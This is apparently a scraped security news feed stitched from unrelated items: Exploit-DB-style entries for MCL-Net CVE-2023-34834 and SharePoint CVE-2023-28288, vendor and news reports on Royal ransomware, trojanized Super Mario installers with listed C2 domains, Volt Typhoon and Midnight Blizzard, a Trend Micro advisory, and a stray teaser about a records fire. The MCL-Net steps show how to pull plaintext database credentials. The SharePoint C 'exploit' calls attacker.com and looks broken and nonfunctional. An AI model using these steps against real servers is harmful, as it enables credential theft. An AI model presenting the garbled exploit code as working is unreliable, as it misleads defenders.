MCL-Net version 4.3.5.8788 suffers from an information disclosure vulnerability.

    # Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure# Date: 5/31/2023# Exploit Author: Victor A. Morales, GM Sectec Inc.# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php# Version: 4.3.5.8788 (other versions may be affected)# Tested on: Microsoft Windows 10 Pro# CVE: CVE-2023-34834Description:Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.Steps to reproduce:1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 2. Browse to the "/file" directory and database entry folders configured3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.

MCL-Net 4.3.5.8788 Information Disclosure

Microsoft SharePoint Enterprise Server 2016 suffers from a spoofing vulnerability.

    // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : Remote// Vendor Homepage:// Microsoft SharePoint Foundation 2013 Service Pack 1// Microsoft SharePoint Server Subscription Edition// Microsoft SharePoint Enterprise Server 2013 Service Pack 1// Microsoft SharePoint Server 2019// Microsoft SharePoint Enterprise Server 2016// Tested on: Windows/Linux// CVE : CVE-2023-28288#include <windows.h>#include <stdio.h>// The vulnerable SharePoint server URLconst char *server_url = "http://example.com/";// The URL of the fake SharePoint serverconst char *fake_url = "http://attacker.com/";// The vulnerable SharePoint server file nameconst char *file_name = "vuln_file.aspx";// The fake SharePoint server file nameconst char *fake_file_name = "fake_file.aspx";int main(){    HANDLE file;    DWORD bytes_written;    char file_contents[1024];    // Create the fake file contents    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");    // Write the fake file to disk    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating fake file: %d\n", GetLastError());        return 1;    }    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))    {        printf("Error writing fake file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Send a request to the vulnerable SharePoint server to download the file    sprintf(file_contents, "%s%s", server_url, file_name);    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating vulnerable file: %d\n", GetLastError());        return 1;    }    if (!InternetReadFileUrl(file_contents, file))    {        printf("Error downloading vulnerable file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Replace the vulnerable file with the fake file    if (!DeleteFile(file_name))    {        printf("Error deleting vulnerable file: %d\n", GetLastError());        return 1;    }    if (!MoveFile(fake_file_name, file_name))    {        printf("Error replacing vulnerable file: %d\n", GetLastError());        return 1;    }    // Send a request to the vulnerable SharePoint server to trigger the vulnerability    sprintf(file_contents, "%s%s", server_url, file_name);    if (!InternetReadFileUrl(file_contents, NULL))    {        printf("Error triggering vulnerability: %d\n", GetLastError());        return 1;    }    // Print a message indicating that the vulnerability has been exploited    printf("Vulnerability exploited successfully.\n");    return 0;}BOOL InternetReadFileUrl(const char *url, HANDLE file){    HINTERNET internet, connection, request;    DWORD bytes_read;    char buffer[1024];    // Open an Internet connection    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);    if (internet == NULL)    {        return FALSE;    }    // Connect to the server    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);    if (connection == NULL)    {        InternetCloseHandle(internet);        return FALSE;    }    // Send the HTTP request    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);    if (request == NULL)    {        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    if (!HttpSendRequest(request, NULL, 0, NULL, 0))    {        InternetCloseHandle(request);        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    // Read the response data    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)    {        if (file != NULL)        {            // Write the data to disk            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))            {                InternetCloseHandle(request);                InternetCloseHandle(connection);                InternetCloseHandle(internet);                return FALSE;            }        }    }    InternetCloseHandle(request);    InternetCloseHandle(connection);    InternetCloseHandle(internet);    return TRUE;}

Microsoft SharePoint Enterprise Server 2016 Spoofing

Fifty years ago, a fire ripped through the National Personnel Records Center. It set off a massive project to save crucial pieces of American history—including, I hoped, my grandfather’s.

The Night 17 Million Precious Military Records Went Up in Smoke

Categories: Business
Ransomware is like that stubborn cold that you thought you kicked, but creeps back up determined to run amok again.



(Read more...)




The post Understanding ransomware reinfection: An MDR case study  appeared first on Malwarebytes Labs.

Ransomware is like that stubborn cold that you thought you kicked, but creeps back up determined to run amok again. The question is what medicine is available to kick this nasty infection for good.

In this post, we'll break down the idea of ransomware reinfection and share a real-life episode where Malwarebytes Managed Detection and Response (MDR) mitigated a resilient ransomware reinfection from the Royal ransomware gang.

**What is ransomware reinfection?**

Imagine this scenario: You've recently battled a vicious ransomware attack, finally restoring your systems to their normal functionality. You breathe a sigh of relief, secure in the knowledge that your data is safe and operations are running smoothly.

Alas, it's not the end of the story.

The ransomware attack you just countered was actually just the final act of a long-drawn series of malicious activities. In other words, many ransomware attacks aren't the start of the problem; they're often the result of an unresolved network compromise.

The true culprit is how the threat actor is gaining access to begin with. Once inside, they steal login credentials, deploy malware, or establish a backdoor—a secret gateway into the network that can be exploited later. This is like them leaving a hidden door unlocked for future visits.

Even after successfully mitigating the immediate ransomware attack, these hidden doors may remain unnoticed, enabling the attackers to infiltrate your network stealthily once more. This is the essence of ransomware reinfection.

Having clarified the terminology, let's delve into a real-world instance of a ransomware reinfection in action.

**Initial Ransomware Attack – November 23, 2022**

Prior to their engagement with Malwarebytes, our customer experienced a ransomware attack on their AWS environment. They chose not to pay the ransom.

The subsequent countermeasure involved a complete system rebuild from backup to recover their operations.

**Onboarding with Malwarebytes MDR and Detection of Reinfection – December 9, 2022**

In response to the initial compromise, the customer onboarded with our Managed Detection and Response (MDR) service and Endpoint Detection and Response (EDR) product. Immediately after installing the EDR on the endpoint, detections for additional ransomware were identified.

Our MDR analyst spotted file detections linked to the previous ransomware attack, attempted outbound communications to a known malicious site (a Cobalt Strike C2 server), and remote inbound RDP connection attempts. The MDR analyst promptly contacted the customer, recommending to block the C2 server and the source of the RDP connections, which the customer promptly implemented.

**New Threat Emerges – December 11, 2022**

Only two days later, a new set of remote host RDP connection attempts were detected. Again, the MDR team advised the customer to block the connection source to prevent further infiltration.

**Critical Incident and Response – December 13, 2022**

A new wave of local host file detections indicated a return of the previously encountered ransomware. An unencountered persistent mechanism was also identified, suggesting that the threat was not completely eliminated. As part of our response, we raised a critical incident to the customer, carried out an extensive threat hunt, and identified two compromised domain admin accounts, a domain controller (DC), and an SQL server.

A Potentially Unwanted Modification (PUM) detection of a disabled Windows system restore setting.

The customers’ C:Program Files directory showed peculiar files like 'desktop.ici.royal.w', 'PackageManagement', 'README.TXT', and 'Uninstall Information'.

This new detection, "Ransomware.Royal", suggests that the attackers were either still present in the network or had gained access again.

Our MDR team promptly reached out to the customer's Security team and initiated a strategic consultation via a Zoom call. Detailed insights were shared on the Indicators of Compromise (IoCs) encountered, and we advised the customer to change the passwords of the affected domain admin accounts.

In response, the customer implemented an enterprise-wide password change and blocked the newly identified C2 server. Additionally, the decision was made to rebuild the compromised DC.

**Lessons from the Incident**

This episode underscores the relentless threat of ransomware reinfection in today's threat landscape, as well as the critical role that 24x7x365 diligence of trained cybersecurity experts, swift responses, and collaborative efforts play in cyber defense.

Without having a similar level of expertise in-house, the reality is that many organizations will see reinfections that could lead to catastrophic results.

In this case, our customer had assumed full recovery from the initial ransomware attack, and if not for the MDR service, they may never had realized that the attack was still ongoing. Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the threat and safeguarded the customer’s digital space.

For more information of our EDR and MDR products and services, please visit https://try.malwarebytes.com/mdr-consultation-new/

Read more:

*   ****How to choose an MDR vendor: 6 questions to ask****
*   **Is an outsourced SOC worth it? Looking at the ROI of MDR**
*   ****3 ways MDR can drive business growth for MSPs****
*   **Cyber threat hunting for SMBs: How MDR can help**

Understanding ransomware reinfection: An MDR case study 

Categories: News
Tags: Mario

Tags:  SupremBot

Tags:  XMR miner

Tags:  cryptominers

Tags:  mining client

Tags:  scheduled task

Tags:  C2

Download your games from trusted sources or you may get more than you bargained for...



(Read more...)




The post SupremeBot and Mario cross the finish line together appeared first on Malwarebytes Labs.

Researchers have reported how popular game installers like Super Mario Games are being used to deliver malware. The malicious components include cryptominers, the SupremeBot mining client, and the open-source Umbral stealer.

The game installers route offers some very distinct advantages to the cybercriminals:

*   The games are very popular and downloads are highly sought after, which increases the chances of people downloading them
*   Game installers are large files which means they can’t be uploaded to most online malware scanners
*   The game install finishes, so the user trusts the installer did what it promised to do and the extras get ignored
*   The targeted systems are high performance machines suitable for playing games. Which means they can be expected to be useful in the intended mining activity

The researchers looked at a trojanized version of a Super Mario game installer which came as an NSIS installer. NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers. In this case it was used to combine three executable files, one of which was the legitimate Super Mario Forever game.

But while the victim is going through the steps of the installation wizard for their game, in the background two secretly dropped files are executed by the same installer.

1.  An XMR (Monero) miner which operates stealthily in the background to mine cryptocurrency for the cybercriminal without authorization and while using system resources in amounts that could be harmful
2.  SupremeBot, a mining client which also downloads a file from a Command & Control (C2) server. In this case an information-stealer identified as the Umbral Stealer

The SupremeBot malware uses some techniques to stay under the radar. First it creates a copy of itself called Super-Mario-Bros.exe and drops that in a randomly named subfolder of the ProgramData folder. It also creates a new scheduled task that runs every 15 minutes to run that copy. When that persistence is set up it kills the process and deletes the original file.

The new copy sends the victim system’s CPU and GPU versions as identifiers to a C2 server to verify if the client is registered. If not, the new client is added and receives XMRig CPU and GPU mining configuration details from the C2 server.

When all that is set up it downloads a Themida packed file. Upon execution, this file unpacks itself and loads the Umbral Stealer into the process memory. The Umbral Stealer is a Windows-based information stealer, which is available on GitHub as an open-source project. It uses Discord webhooks to send collected data to the cybercriminal.

The collected data is obtained from the affected system by:

*   Capturing screenshots
*   Retrieving browser passwords and cookies
*   Capturing webcam images
*   Obtaining telegram session files and discord tokens
*   Acquiring Roblox cookies and Minecraft session files
*   Collecting files associated with cryptocurrency wallets

**Advice**

To prevent falling victim, here are some guidelines:

*   Only download from trusted sources
*   Monitor your system for high CPU usage and other performance issues
*   Use an updated and real-time anti-malware protection

C2 servers:

silentlegion\[.\]duckdns\[.\]org

shadowlegion\[.\]duckdns\[.\]org

Malwarebytes EDR and MDR remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

SupremeBot and Mario cross the finish line together

Trend Micro Security 2021, 2022, and 2023 (Consumer) are vulnerable to a DLL Hijacking vulnerability which could allow an attacker to use a specific executable file as an execution and/or persistence mechanism which could execute a malicious program each time the executable file is started.

**LAST UPDATED: MAY 16, 2023**

**Release Date:** March 28, 2023

**CVE Vulnerability Identifier:** CVE-2023-28929

**Platform(s):** Microsoft Windows

**CVSS:** 3.1

**Scores:** 8.6: AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Severity Rating:** Medium

**Summary**

Trend Micro has released an update via ActiveUpdate for the Trend Micro Security for Windows family of consumer products (2021,2022, and 2023) which resolves a DLL hijacking vulnerability.

**Affected version(s)**

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Security

2022/2023 (17.7.1476 and below)

Microsoft Windows

English

Trend Micro Security

2021 (17.0.1412 and below)

Microsoft Windows

English

**Solution**

Trend Micro has released an update via ActiveUpdate for each version below that resolves the issue.

PRODUCT

APPLICABLE VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Security

2022/2023 (17.7.1634 and below)

Microsoft Windows

English

Trend Micro Security

2021 (17.0.1426 and below)

Microsoft Windows

English

**Vulnerability Details**

Trend Micro Security 2021, 2022, and 2023 (Consumer) are vulnerable to a DLL Hijacking vulnerability which could allow an attacker to use a specific executable file as an execution and/or persistence mechanism which could execute a malicious program each time the executable file is started.

Trend Micro has received no reports nor is aware of any actual attacks against the affected product related to this vulnerability at this time.

**Acknowledgement**

Trend Micro would like to thank the following individuals for responsibly disclosing the issue and working with Trend Micro to help protect our customers:

*   Nippon Telegraph and Telephone Corporation, NTT Security (Japan) KK, NTT DATA Corporation
    *   Rintaro Fujita
    *   Hiroki Hada
    *   Hiroki Mashiko

**Additional Assistance**

Customers who have questions are encouraged to contact Trend Micro Technical Support for further assistance.

How helpful was this article?

*   It wasn't helpful at all.
*   Somewhat helpful.
*   Just okay.
*   It was somewhat helpful.
*   It was helpful.

*   \*Feedback submitted will only be used as reference for future product, service and article improvements.

CVE-2023-28929: Security Bulletin: Trend Micro Security DLL Hijacking

A recent campaign shows that the politically motivated threat actor has more tricks up its sleeve than previously known, targeting an old RCE flaw and wiping logs to cover their tracks.

_Editor's Note: This article was updated on 7/3/2023 to clarify that_ _CVE-2021-40539_ _was patched in Sept. 2021._

The recently discovered Chinese state-backed advanced persistent threat (APT) "Volt Typhoon," aka "Vanguard Panda," has been spotted using a two-year old critical vulnerability in Zoho's ManageEngine ADSelfService Plus, a single sign-on and password management solution. And it's now sporting plenty of previously undisclosed stealth mechanisms.

Volt Typhoon came to the fore last month, thanks to joint reports from Microsoft and various government agencies. The reports highlighted the group's infection of critical infrastructure in the Pacific region, to be used as a possible future beachhead in the event of conflict with Taiwan.

The reports detailed a number of Volt Typhoon's tactics, techniques, and procedures (TTPs), including its use of internet-exposed Fortinet FortiGuard devices for initial intrusion, and the hiding of network activity via compromised routers, firewalls, and VPN hardware.

But a recent campaign outlined by CrowdStrike in a recent blog post suggests that Volt Typhoon is flexible, with the ability to customize its tactics based on data gathered through extensive reconnaissance. In this case, the group utilized CVE-2021-40539 in ManageEngine for intrusion, then masked its Web shell as a legitimate process and erased logs as it went along.

These previously unknown tactics enabled "pervasive access to the victim's environment for an extended period," says Tom Etheridge, chief global professional services officer for CrowdStrike, which didn't reveal details on the victim's location or profile. "They were familiar with the infrastructure that the customer had, and they were diligent about cleaning up their tracks."

**Volt Typhoon's Evolving Cyber Tactics**

CrowdStrike researchers' spidey senses tingled when suspicious activity seemed to be emanating from its unidentified client's network.

The then-unrecognized entity appeared to be performing extensive information-gathering — testing network connectivity, listing processes, gathering user information, and much more. It "indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for \[Windows Management Instrumentation\]," the researchers wrote in their blog post.

It turned out, after some investigating, that the attacker — Volt Typhoon — had deployed a webshell to the network a whole six months prior. How did it go unnoticed for so long?

The story began with CVE-2021-40539, a critical (9.8 CVSS score) remote code execution (RCE) vulnerability in ADSelfService Plus, discovered and patched back in Sept. 2021. ManageEngine software, and ADSelfService Plus in particular, has been critically exposed on a number of occasions in recent years (CVE-2021-40539 isn't even its most recent critical 9.8 CVSS RCE vulnerability — that title goes to CVE-2022-47966).

With initial access, the attackers were able to drop a Web shell. Here was where the more interesting stealth began, as the researchers observed "the webshell was attempting to masquerade as a legitimate file of ManageEngine ADSelfService Plus by setting its title to ManageEngine ADSelfService Plus and adding links to legitimate enterprise help desk software."

The group proceeded to siphon administrator credentials and move laterally in the network. It took a cruder, manual approach to covering its tracks this time around, going to "extensive lengths to clear out multiple log files and remove excess files from disk," the researchers explained.

The evidence tampering was extensive, nearly eliminating all traces of malicious activity. However, the attackers forgot to erase the Java source code and compiled Class files from their targeted Apache Tomcat Web server.

"If it wasn't for that slight slip up that was reported in the blog, they probably would have gone unnoticed," Etheridge says.

**How to Defend Against Volt Typhoon Cyberattacks**

Thus far, Volt Typhoon has been observed targeting organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. It's most notable, however, for seeking out critical infrastructure in the United States and Guam — a strategic point of American defense of Taiwan against China.

According to Etheridge, some of the same principles in this case study could be equally applied to a critical infrastructure breach. "Operational technology (OT)-type environments are typically targeted through IT infrastructure first, before the threat actor moves to the infrastructure," he points out. "Certainly the tactics that we see them deploying would be concerning from a critical infrastructure perspective."

To meet the threat of Volt Typhoon, Etheridge says, one major point is identity management.

"Identity is a huge challenge for a lot of organizations. We've seen a huge uptick in advertisements for stolen credentials, and stolen credentials are leveraged quite extensively in the incidents that we respond to each and every day," he says. In this case, being able to leverage stolen credentials was key to Volt Typhoon's remaining under the radar for so many months.

Etheridge also emphasizes the importance of threat hunting and incident response. Nation-state threat actors are notoriously impossible to stop entirely, but organizations will be better prepared to mitigate the worst possible consequences, he says, if they're able "to understand when something is going on in your environment, and being able to take corrective action quickly."

China's 'Volt Typhoon' APT Turns to Zoho ManageEngine for Fresh Cyberattacks

By Deeba Ahmed
Cyble Research and Intelligence Lab's cybersecurity researchers have disclosed how threat actors exploit gamers by delivering malware-loaded installers of popular games.
This is a post from HackRead.com Read the original post: Fake Super Mario 3 Installers Drop Crypto Miner, Data Stealer

**The malware has the potential to target large-scale victims since games like Super Mario 3 are famous among and adored by children around the world.**

Recently, Cyble researchers discovered a trojanized version of the Super Mario 3: Mario Forever installer. The malware hidden inside the installer can perform various malicious tasks, such as stealing sensitive data, deploying cryptocurrency miners, and launching ransomware.

**Beware of Fake Super Mario 3 Installer**

Researchers have noted that game installers have emerged as a lucrative way to maximize monetary gains. Threat actors prefer to exploit game installers for delivering malware due to their extensive user base, powerful hardware, and large file size, which allows them to easily hide malware. Gamers trust these installers, considering them legitimate software, but social engineering can allow attackers to exploit this trust and trick gamers into downloading malware.

In this case, the researchers wrote that the fake installer comes with three executable files. One of these files installs the game, while the other two files, titled java.exe and atom.exe, are installed in the AppData directory on the device. Both files are assigned different tasks.

*   Java.exe- it may look like a regular Java runtime, but in reality, it is a Monero cryptocurrency miner tasked with establishing a connection to a mining server (gulfmonerooceanstream).
*   Atom.exe- It is a self-duplicating SupremeBot mining client that creates a scheduled task for executing the copy every fifteen minutes. SupremeBot has to fetch another executable, “wime.exe,” after establishing a connection to a C2 server.

**How does it work?**

After the malicious installer file “super-mario-forever-v702e” is installed on the system, it launches an XMR miner and a SupremeBot mining program through two files. Once this is done, a connection to the C2 server is established to transmit data information, register the client, and obtain the required configuration to start cryptocurrency mining. This is followed by fetching the “wime.exe” executable, an open-source Umbral Stealer.

Malware-infected Super Mario game installer (left) – Malware files upon installation (right) – Screenshots credit: Cyble

The Umbral Stealer is capable of stealing sensitive user data from the targeted device, which includes stored cookies and passwords, session tokens, credentials from cryptocurrency wallets, and authentication tokens for other platforms or games. Additionally, it disables Windows Defender to evade detection if tamper protection is inactive. However, if tamper protection is active, it adds the process to the exclusion list.

**Potential Dangers**

The malicious Super Mario 3 installer is quite lethal as it is capable of cryptocurrency mining and data stealing. This can result in heavy financial losses for victims and drain computer resources, causing a decline in system performance.

“Malware distributed through game installers can be monetized through activities like stealing sensitive information, conducting ransomware attacks, and more,” Cyble’s report read.

1.  Alert: Android Super Mario Run is Actually Malware
2.  Minecraft declared the most malware-infected game
3.  Stop downloading fake malicious Fortnite Android apps
4.  ROBLOX, Nintendo game cracks drop ChromeLoader malware

Fake Super Mario 3 Installers Drop Crypto Miner, Data Stealer

** DISPUTED ** Lack of access control in wfc.exe in Malwarebytes Binisoft Windows Firewall Control 6.9.2.0 allows local unprivileged users to bypass Windows Firewall restrictions via the user interface's rules tab. NOTE: the vendor's perspective is "this is intended behavior as the application can be locked using a password."

CVE-2023-36631

Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard.
The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat

Cyber Threat / Password Security

Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard.

The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said.

Midnight Blizzard, formerly known as **Nobelium**, is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes.

The group, which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities.

It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area.

"These credential attacks use a variety of password spray, brute-force, and token theft techniques," Microsoft said in a series of tweets, adding the actor "also conducted session replay attacks to gain initial access to cloud resources leveraging stolen sessions likely acquired via illicit sale."

The tech giant further called out APT29 for its use of residential proxy services to route malicious traffic in an attempt to obfuscate connections made using compromised credentials.

"The threat actor likely used these IP addresses for very short periods, which could make scoping and remediation challenging," the Windows makers said.

The development comes as Recorded Future detailed a new spear-phishing campaign orchestrated by APT28 (aka BlueDelta, Forest Blizzard, FROZENLAKE, Iron Twilight, and Fancy Bear) targeting government and military entities in Ukraine since November 2021.

The attacks leveraged emails bearing attachments exploiting multiple vulnerabilities in the open-source Roundcube webmail software (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to conduct reconnaissance and data gathering.

A successful breach enabled the Russian military intelligence hackers to deploy rogue JavaScript malware that redirected the incoming emails of targeted individuals to an email address under the attackers' control as well as steal their contact lists.

"The campaign displayed a high level of preparedness, quickly weaponizing news content into lures to exploit recipients," the cybersecurity company said. "The spear-phishing emails contained news themes related to Ukraine, with subject lines and content mirroring legitimate media sources."

More importantly, the activity is said to dovetail with another set of attacks weaponizing a then-zero-day flaw in Microsoft Outlook (CVE-2023-23397) that Microsoft disclosed as employed in "limited targeted attacks" against European organizations.

The privilege escalation vulnerability was addressed as part of Patch Tuesday updates rolled out in March 2023.

The findings demonstrate Russian threat actors' persistent efforts in harvesting valuable intelligence on various entities in Ukraine and across Europe, especially following the full-scale invasion of the country in February 2022.

The cyberwarfare operations aimed at Ukrainian targets have been notably marked by the widespread deployment of wiper malware designed to delete and destroy data, turning it into one of the earliest instances of large-scale hybrid conflict.

"BlueDelta will almost certainly continue to prioritize targeting Ukrainian government and private sector organizations to support wider Russian military efforts," Recorded Future concluded.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows